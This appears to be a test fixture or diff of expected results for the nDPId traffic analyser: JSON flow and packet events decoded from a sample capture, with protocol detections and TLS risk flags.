00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"thread_ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="}
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391199,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1470104391199,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1470104391199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1470104391199,"pkt":"TF4M6gNlABxCjnAxCABFAAApUk5AAIAGdmbAqHMIQOm9gMGtAFD1eICMR0KJzlAQAXpzKwAAAA=="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
@@ -321,7 +321,7 @@
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
@@ -362,12 +362,12 @@
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"}
00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"}
00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"}
